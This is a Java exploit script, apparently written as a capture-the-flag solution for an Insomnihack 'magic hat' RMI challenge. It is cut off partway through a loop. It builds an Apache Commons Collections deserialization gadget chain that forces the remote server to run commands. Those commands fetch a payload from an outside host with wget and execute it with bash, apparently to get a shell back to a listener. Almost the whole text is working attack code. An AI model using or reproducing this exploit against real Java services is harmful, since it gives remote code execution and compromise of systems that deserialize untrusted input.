/* javac -cp '.:magic_hat_client.jar' Magic.java java -cp '.:magic_hat_client.jar' Magic */ /* for rmi */ import java.net.InetAddress; import java.rmi.RemoteException; import java.rmi.NotBoundException; import java.rmi.registry.Registry; import java.rmi.registry.LocateRegistry; import java.net.UnknownHostException; import java.util.Properties; import javax.rmi.ssl.SslRMIClientSocketFactory; import ch.scrt.model.Hat; import ch.scrt.model.Wand; import ch.scrt.WizardAPI; import java.lang.reflect.Field; import java.util.HashMap; import java.util.Map; /* for gadgets */ import org.apache.commons.collections.bag.AbstractMapBag; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; public class Magic { public static void main(final String[] args) throws Exception { Properties props = System.getProperties(); props.setProperty("javax.net.ssl.trustStore", "/tmp/magic_hat_truststore"); props.setProperty("javax.net.ssl.trustStorePassword", "magic_hat"); props.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true"); /* first execute this thing.. */ System.out.println("[*] download payload..."); exec_cmd("/usr/bin/wget -r -O /tmp/asdf99.xx https://lokalhost.pl/fasfafafa"); Thread.sleep(1000 * 2); /* then this one, this is couse java sucks and using regular bash is quite hard... */ System.out.println("[*] execute the payload..."); exec_cmd("/usr/bin/bash /tmp/asdf99.xx"); System.out.println("[*] check your listner..."); } private static void exec_cmd(final String cmd ) throws IllegalAccessException,NoSuchFieldException, RemoteException,UnknownHostException, NotBoundException,RemoteException { Registry registry = LocateRegistry.getRegistry(InetAddress.getByName("magichat.teaser.insomnihack.ch").getHostName(), 51966, new SslRMIClientSocketFactory()); WizardAPI api = (WizardAPI)registry.lookup("Wizard"); Hat h1 = get_object(cmd); try { api.castASpell(h1); } catch (Exception e) { } } private static Hat get_object(final String cmd) throws IllegalAccessException,NoSuchFieldException { final String[] execArgs = new String[] { cmd }; final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String.class }, execArgs), new ConstantTransformer(1) }; Transformer transformerChain = new ChainedTransformer(transformers); final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); TiedMapEntry entry = new TiedMapEntry(lazyMap, "chuj"); Hat hat = new Hat(); hat.add(new Wand() ); Field f0 = null; f0 = Hat.class.getDeclaredField("content"); f0.setAccessible(true); AbstractMapBag a0 = (AbstractMapBag)f0.get(hat); Field f1 = null; f1 = AbstractMapBag.class.getDeclaredField("map"); f1.setAccessible(true); Map innimpl = (Map) f1.get(a0); Field f2 = null; f2 = HashMap.class.getDeclaredField("table"); f2.setAccessible(true); Object[] array = (Object[]) f2.get(innimpl); Object node = array[0]; for(int i=1; i